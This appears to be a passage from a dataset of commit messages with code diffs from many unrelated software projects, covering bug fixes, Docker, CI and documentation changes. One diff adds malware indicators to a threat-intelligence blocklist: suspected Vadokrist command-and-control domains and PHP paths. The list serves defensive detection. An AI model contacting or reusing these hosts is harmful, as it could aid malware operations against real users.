SPEDAS cdipdir_vec. + """ + if ((time_in is None or not isinstance(time_in, list)) + and (iyear is None or not isinstance(iyear, list)) + and (idoy is None or not isinstance(idoy, list))): + return cdipdir(time_in, iyear, idoy) + + if (iyear is None) or (idoy is None): + if len(time_in) == 1: + iyear, idoy, ih, im, isec = get_time_parts(time_in) + else: + iyear = [] + idoy = [] + for i in range(len(time_in)): + _iyear, _idoy, ih, im, isec = get_time_parts(time_in[i]) + iyear.append(_iyear) + idoy.append(_idoy) + + d1 = [] + d2 = [] + d3 = [] + for i in range(len(idoy)): + _d1, _d2, _d3 = cdipdir(None, iyear[i], idoy[i]) + d1.append(_d1) + d2.append(_d2) + d3.append(_d3) + + return d1, d2, d3 def tgsegsm_vect(time_in, data_in):
helper: Add muted stream unreads to unread_counts. We previously skipped setting unread_counts for streams which were muted. We now set these counts so that when unmuting (muted) streams we have values to use, to set their unread_count.
@@ -317,8 +317,6 @@ def classify_unread_counts(model: Any) -> UnreadCounts: for stream in unread_msg_counts['streams']: count = len(stream['unread_message_ids']) stream_id = stream['stream_id'] - if stream_id in model.muted_streams: - continue if [model.stream_dict[stream_id]['name'], stream['topic']] in model.muted_topics: continue
MAINT: handle case where input data is a python container [FIXED] handling List, or Tuple type hints requires we consider that when validating data types
@@ -959,6 +959,9 @@ def _validate_data_type(self, data): }: return True + if isinstance(data, (tuple, list)): + data = data[0] + class_name = data.__class__.__name__ valid = class_name in self._data_types if not valid:
Add reminder to clear build/ directory. Otherwise full-build detritus can get bundled into the lite build. See issue
@@ -136,7 +136,7 @@ Release Procedure `git tag vX.Y.Z` - Push the tag to Github with: `git push <github-remote> vX.Y.Z` - - Push the package to PyPI with: - `cd python && ./setup.py sdist bdist_wheel upload` - Push the lite package to PyPI with: - `cd python && ./setup.py lite sdist bdist_wheel upload` + `cd python && rm -rf build && ./setup.py lite sdist bdist_wheel upload` + - Push the package to PyPI with: + `cd python && rm -rf build && ./setup.py sdist bdist_wheel upload`
Disable additional shuffling while training Before this change dataset was shuffled once and then on every step random sample was returned. Problem is that this way we do not guarantee that all samples from dataset will be used.
@@ -387,16 +387,22 @@ class Tub(object): pass - def get_record_gen(self, record_transform=None, shuffle=True, df=None): + def get_record_gen(self, record_transform=None, shuffle=False, df=None): if df is None: df = self.get_df() - while True: - for row in self.df.iterrows(): + for row in df.iterrows(): + # NOTE: If shuffle enabled, random sample will be returned, + # this does not guarantee that all samples will be used + # during training. Please also note that shuffling already + # happening once for whole dataset in get_train_val_gen + # function. if shuffle: record_dict = df.sample(n=1).to_dict(orient='record')[0] + else: + record_dict = row[1].to_dict() if record_transform: record_dict = record_transform(record_dict) @@ -406,7 +412,7 @@ class Tub(object): yield record_dict - def get_batch_gen(self, keys, record_transform=None, batch_size=128, shuffle=True, df=None): + def get_batch_gen(self, keys, record_transform=None, batch_size=128, shuffle=False, df=None): record_gen = self.get_record_gen(record_transform, shuffle=shuffle, df=df)
Raise warning only if check_sld is True If the user is not worried about the slenderness ratio this warning can pollute the output screen. This avoids raising the warning when we are not checking the slenderness ratio.
@@ -1391,6 +1391,8 @@ class Rotor(object): for shaft in self.shaft_elements if shaft.slenderness_ratio < 1.6 ] + + if check_sld: if len(SR): warnings.warn( "The beam elements " @@ -1438,7 +1440,7 @@ class Rotor(object): ), showlegend=False, hoverinfo="none", - ), + ) ) # plot shaft elements @@ -1889,7 +1891,7 @@ class Rotor(object): t_, yout, xout = self.time_response(speed, F, t) results = TimeResponseResults( - t, yout, xout, self.nodes, self.nodes_pos, self.number_dof, + t, yout, xout, self.nodes, self.nodes_pos, self.number_dof ) return results @@ -3199,10 +3201,10 @@ def rotor_example(): ] disk0 = DiskElement.from_geometry( - n=2, material=steel, width=0.07, i_d=0.05, o_d=0.28, + n=2, material=steel, width=0.07, i_d=0.05, o_d=0.28 ) disk1 = DiskElement.from_geometry( - n=4, material=steel, width=0.07, i_d=0.05, o_d=0.28, + n=4, material=steel, width=0.07, i_d=0.05, o_d=0.28 ) stfx = 1e6
use pytest `python setup.py test` has been deprecated.
@@ -31,7 +31,7 @@ The sections below outline the steps in each case. 1. (**important**) announce your plan to the rest of the community *before you start working*. This announcement should be in the form of a (new) issue; 1. (**important**) wait until some kind of consensus is reached about your idea being a good idea; 1. if needed, fork the repository to your own Github profile and create your own feature branch off of the latest master commit. While working on your feature branch, make sure to stay up to date with the master branch by pulling in changes, possibly from the 'upstream' repository (follow the instructions [here](https://help.github.com/articles/configuring-a-remote-for-a-fork/) and [here](https://help.github.com/articles/syncing-a-fork/)); -1. make sure the existing tests still work by running ``python setup.py test``; +1. make sure the existing tests still work by running ``pytest``; 1. add your own tests (if necessary); 1. update or expand the documentation; 1. update the `CHANGELOG.md` file with change;
Add missing DHCPv6 ports from constants Still not in use. Will be used in [1] [1] Partially-implements: blueprint ipv6
@@ -117,6 +117,8 @@ METADATA_HTTP_PORT = 80 DHCP_CLIENT_PORT = 68 DHCP_SERVER_PORT = 67 +DHCPV6_CLIENT_PORT = 546 +DHCPV6_SERVER_PORT = 547 EMPTY_MAC = '00:00:00:00:00:00' BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
Update travis.yml The CI is refactored to include the two stages "linting" and "test". The former includes a check of black code style and is (currently) allowed to fail.
@@ -7,9 +7,19 @@ python: install: - pip install docutils - pip install -e . + - pip install black>=19.10b0 env: MPLBACKEND=Agg +jobs: + allow_failures: + env: + - CAN_FAIL=true + include: + - stage: "linting" + env: CAN_FAIL=true + script: black --check . + - stage: "test" script: - pytest - rst2html.py --halt=2 README.rst >/dev/null
Use context manager for file open Also remove a useless print statement to reduce noise
@@ -161,7 +161,6 @@ class SiteManager: exists = cursor.fetchone() if exists: # Assume metricity is already populated if it exists - print("Metricity already exists, not creating.") return print("Creating metricity relations and populating with some data.") cursor.execute("CREATE DATABASE metricity") @@ -171,8 +170,8 @@ class SiteManager: database="metricity", **db_connection_kwargs ) - with conn.cursor() as cursor: - cursor.execute(open("postgres/init.sql").read()) + with conn.cursor() as cursor, open("postgres/init.sql", encoding="utf-8") as f: + cursor.execute(f.read()) def prepare_server(self) -> None: """Perform preparation tasks before running the server."""
Updated Dependency Installation name Was Ubuntu before but changed it to Fedora (since Ubuntu was above)
@@ -8,7 +8,7 @@ Local Installation (For Development) [*Also remember the database dependency in the README.md file*](http://ghtorrent.org/msr14.html) 1. [Dependency Installation for Ubuntu](#Ubuntu) -1. [Dependency Installation for Ubuntu](#Fedora) +1. [Dependency Installation for Fedora](#Fedora) 1. [Dependency Installation for OS X](#MacOSX) ### 2. [Install Augur](#Install)
Fix last example command to remove postgres data vol change name of postgres data volume container
@@ -266,4 +266,4 @@ Delete a persistent storage volume: **WARNING: All postgres data will be destroyed.** - `$ docker-compose stop -t 0 postgres` - `$ docker-compose rm postgres` - - `$ docker volume rm osf_postgres_data_vol` + - `$ docker volume rm osfio_postgres_data_vol`
Update querying.rst From the original description, it sounded like using .tuples(), .dicts() etc would imply .iterate(), which is not the case. Explicitly state that for maximum performance you might want to do both, and show how you should do it.
@@ -711,6 +711,21 @@ dictionaries, namedtuples or tuples. The following methods can be used on any * :py:meth:`~BaseQuery.namedtuples` * :py:meth:`~BaseQuery.tuples` +Don't forget to append the :py:meth:`~BaseQuery.iterator` method call to also +reduce memory consumption. For example, the above code might look like: + +.. code-block:: python + + # Let's assume we've got 10 million stat objects to dump to a csv file. + stats = Stat.select() + + # Our imaginary serializer class + serializer = CSVSerializer() + + # Loop over all the stats (rendered as tuples, without caching) and serialize. + for stat_tuple in stats.tuples().iterator(): + serializer.serialize_tuple(stat_tuple) + When iterating over a large number of rows that contain columns from multiple tables, peewee will reconstruct the model graph for each row returned. This operation can be slow for complex graphs. For example, if we were selecting a
Python API: fix the wrapping of integer values TN:
@@ -140,7 +140,7 @@ class PythonAPISettings(AbstractAPISettings): return dispatch_on_type(type, [ (ct.bool_type, lambda _: ctype_type('c_uint8')), - (ct.long_type, lambda _: ctype_type('c_long')), + (ct.long_type, lambda _: ctype_type('c_int')), (ct.lexical_env_type, lambda _: 'LexicalEnv._c_type'), (ct.logic_var_type, lambda _: 'LogicVar._c_type'), (ct.equation_type, lambda _: 'Equation._c_type'),
Update dynamics_model_utils.py To increase readability, make use of pandas index method `get_loc` instead of relying on `np.where`.
@@ -770,7 +770,7 @@ class BaseDynamics: self.weights_upper &= w_upper def load_pars(self, adata, gene): - idx = np.where(adata.var_names == gene)[0][0] if isinstance(gene, str) else gene + idx = adata.var_names.get_loc(gene) if isinstance(gene, str) else gene self.alpha = adata.var["fit_alpha"][idx] self.beta = adata.var["fit_beta"][idx] * adata.var["fit_scaling"][idx] self.gamma = adata.var["fit_gamma"][idx]
Update contact_list.py Try to fix
@@ -73,8 +73,8 @@ class ContactList(MyTreeView): selected_keys.append(sel_key) if not selected_keys or not idx.isValid(): menu.addAction(_("New contact"), lambda: self.parent.new_contact_dialog()) - menu.addAction(_("Import file"), lambda: self.import_contacts()) - menu.addAction(_("Export file"), lambda: self.export_contacts()) + menu.addAction(_("Import file"), lambda: self.parent.import_contacts()) + menu.addAction(_("Export file"), lambda: self.parent.export_contacts()) else: column_title = self.model().horizontalHeaderItem(column).text() column_data = '\n'.join(self.model().itemFromIndex(s_idx).text()
Make MlflowClient serializable Make the Java MlflowClient class implement Serializable so that it can be used in Spark jobs
@@ -10,6 +10,7 @@ import org.mlflow.api.proto.Service.*; import org.mlflow.tracking.creds.*; import java.io.File; +import java.io.Serializable; import java.net.URI; import java.net.URISyntaxException; import java.util.ArrayList; @@ -21,7 +22,7 @@ import java.util.stream.Collectors; /** * Client to an MLflow Tracking Sever. */ -public class MlflowClient { +public class MlflowClient implements Serializable { protected static final String DEFAULT_EXPERIMENT_ID = "0"; private final MlflowProtobufMapper mapper = new MlflowProtobufMapper();
Update vadokrist.txt Have parsed addresses from screenshots (absent in IoC base list in the ESET's article).
@@ -15,6 +15,12 @@ http://191.237.255.155 http://191.239.244.141 http://191.239.245.87 http://191.239.255.102 +cloudmx.homelinux.com +dumblegat.simple-url.com +javfoms.podzone.org +jotagot.mypets.ws +metalpink.serveftp.org +vemvem.duckdns.org # Reference: https://twitter.com/wwp96/status/1366485090340077572 # Reference: https://app.any.run/tasks/e5727887-2bdb-4f37-a1ad-cb43d88a9828/ @@ -35,3 +41,11 @@ shax9281930x892.s3-sa-east-1.amazonaws.com /paodequeijo/HGFGHGFH.php /sh2002039/000000.php +/JarLOTESmefrasd121.php +/KROmsoameo201920mda.php +/LABrusoamdoo10192012.php +/LOPRSMo109102912.php +/ORTEGAHSK019mersoak.php +/Posmeoirmso01929MKDK.php +/timdim.php +/timdim02.php
JSON: throw warning for incompatible function names if functions share names with nodes or graphs, they'll be treated as references to the node or graph instead.
@@ -199,6 +199,7 @@ import pint import psyneulink import re import types +import warnings from psyneulink.core.globals.keywords import \ MODEL_SPEC_ID_COMPOSITION, MODEL_SPEC_ID_GENERIC, MODEL_SPEC_ID_NODES, MODEL_SPEC_ID_PARAMETER_SOURCE, \ @@ -206,7 +207,7 @@ from psyneulink.core.globals.keywords import \ MODEL_SPEC_ID_SENDER_MECH, MODEL_SPEC_ID_SENDER_PORT, MODEL_SPEC_ID_TYPE, MODEL_SPEC_ID_OUTPUT_PORTS, MODEL_SPEC_ID_MDF_VARIABLE, MODEL_SPEC_ID_INPUT_PORTS, MODEL_SPEC_ID_SHAPE, MODEL_SPEC_ID_METADATA from psyneulink.core.globals.parameters import ParameterAlias from psyneulink.core.globals.sampleiterator import SampleIterator -from psyneulink.core.globals.utilities import convert_to_list, get_all_explicit_arguments, \ +from psyneulink.core.globals.utilities import convert_to_list, gen_friendly_comma_str, get_all_explicit_arguments, \ parse_string_to_psyneulink_object_string, parse_valid_identifier, safe_equals, convert_to_np_array __all__ = [ @@ -651,6 +652,14 @@ def _generate_component_string( # pnl objects only have one function unless specified in another way # than just "function" if 'functions' in component_dict: + dup_function_names = set([name for name in component_dict['functions'] if name in component_identifiers]) + if len(dup_function_names) > 0: + warnings.warn( + f'Functions ({gen_friendly_comma_str(dup_function_names)}) of' + f' {name} share names of mechanisms or compositions in this' + ' model. This is likely to cause incorrect script reproduction.' + ) + function_determined_by_output_port = False try:
Update Dockerfile.dev Made some changes to support Python3, and fixed a few path related issues.
-FROM ubuntu +FROM ubuntu:18.04 MAINTAINER perryism @@ -6,8 +6,12 @@ RUN apt-get update && \ apt-get -y install \ wget \ zip \ - python-pip \ + python3-pip \ + python3-dev \ git \ + && cd /usr/local/bin \ + && ln -s /usr/bin/python3 python \ + && pip3 install --upgrade pip \ && rm -rf /var/lib/apt/lists/* ARG VERSION=0.9.0 @@ -19,12 +23,12 @@ WORKDIR /app/knowledge-repo-$VERSION COPY . /app/knowledge-repo-$VERSION -RUN pip install -r requirements.txt +RUN pip3 install -r docker/requirements.txt -COPY entrypoint.sh /app/knowledge-repo-$VERSION +COPY docker/entrypoint.sh /app/knowledge-repo-$VERSION VOLUME /data EXPOSE 7000 -CMD ["./entrypoint.sh"] +CMD ["bash", "./entrypoint.sh"]
fix arg type fix default arg type string to int
@@ -97,7 +97,7 @@ if __name__ == '__main__': '--out', dest='output', default='out.jpg', help='the name of the output file.') parser.add_argument( - '--max-results', dest='max_results', default=4, + '--max-results', dest='max_results', default=4, type=int, help='the max results of face detection.') args = parser.parse_args()
Internally enable Flake8 lints for invalid whitespace W291 - Trailing whitespace W293 - blank line contains whitespace
@@ -5,8 +5,6 @@ extend-ignore: E501, # line too long (> 79 characters) E731, # Do not assign a lambda expression E741, # Ambiguous variable name (enable once fixed) - W291, # Trailing whitespace (enable once fixed) - W293, # Blank line contains whitespace (enable once fixed) W503, # line break before binary operator (conflicts with Black) W605, # invalid escape sequence (enable once fixed) PB10, # Bad class attribute (enable once fixed)
Handle different kernel builds on SUSE Linux Enterprise SUSE has introduced the kernel-azure build to support faster feature enablement for Azure than is possible with the kernel-default build. This requires that the RDMA kernel modules are built against both kernels. Therefore the agent must install the proper package for the running kernel.
# Microsoft Azure Linux Agent # -# Copyright 2017 Microsoft Corporation +# Copyright 2018 Microsoft Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -40,7 +40,23 @@ class SUSERDMAHandler(RDMAHandler): zypper_remove = 'zypper -n rm %s' zypper_search = 'zypper -n se -s %s' zypper_unlock = 'zypper removelock %s' + package_name = 'dummy' + # Figure out the kernel that is running to find the proper kmp + cmd = 'uname -r' + status, kernel_release = shellutil.run_get_output(cmd) + if 'default' in kernel_release: package_name = 'msft-rdma-kmp-default' + info_msg = 'RDMA: Detected kernel-default' + logger.info(info_msg) + elif 'azure' in kernel_release: + package_name = 'msft-rdma-kmp-azure' + info_msg = 'RDMA: Detected kernel-azure' + logger.info(info_msg) + else: + error_msg = 'RDMA: Could not detect kernel build, unable to ' + error_msg += 'load kernel module. Kernel release: "%s"' + logger.error(error_msg % kernel_release) + return cmd = zypper_search % package_name status, repo_package_info = shellutil.run_get_output(cmd) driver_package_versions = []
Improve _exprs() Get the user message if the ouput from a function is nan. Some code improvements
@@ -507,10 +507,9 @@ def cols(self): :return: json """ functions_array = ["min", "max", "stddev", "kurtosis", "mean", "skewness", "sum", "variance", - "approx_count_distinct", "na", "zeros", "percentile"] + "approx_count_distinct", "countDistinct", "na", "zeros", "percentile", "count"] _result = {} - if is_dict(data): - for k, v in data.items(): + for k, v in data[0].items(): for f in functions_array: temp_func_name = f + "_" if k.startswith(temp_func_name): @@ -518,13 +517,13 @@ def cols(self): # If the value is numeric only get 5 decimals if is_numeric(v): v = round(v, 5) - _result.setdefault(_col_name, {})[f] = v - else: - if is_numeric(data): - data = round(data, 5) - _result = data + if is_nan(v): + print( + "'{FUNCTION}' function in '{COL_NAME}' column is returning 'nan'. Is that what you expected?. Seems that {COL_NAME} has 'nan' values".format( + FUNCTION=f, + COL_NAME=_col_name)) - return _result + _result.setdefault(_col_name, {})[f] = v # Ensure that is a list funcs = val_to_list(funcs) @@ -540,7 +539,8 @@ def cols(self): # print(col_name, is_column_a(df, col_name, "date"), func is F.stddev) # Std dev is can not process date columns. So we do not calculated - if not ((func in [F.stddev, F.kurtosis, F.mean, F.skewness, F.sum, F.variance, zeros_agg]) and ( + if not ((func in [F.stddev, F.kurtosis, F.mean, F.skewness, F.sum, F.variance, F.approx_count_distinct, + F.count, zeros_agg]) and ( is_column_a(df, col_name, "date"))): # A different function must be use to calculate null in integers or data column data types if func is na_agg and is_column_a(df, col_name, PYSPARK_NUMERIC_TYPES): @@ -548,9 +548,7 @@ def cols(self): expression.append(func(col_name).alias(func.__name__ + "_" + col_name)) - # print(expression) - result = parse_col_names_funcs_to_keys(format_dict(df.agg(*expression).to_json())) - return result + return format_dict(parse_col_names_funcs_to_keys(df.agg(*expression).to_json())) # Quantile statistics @add_attr(cols)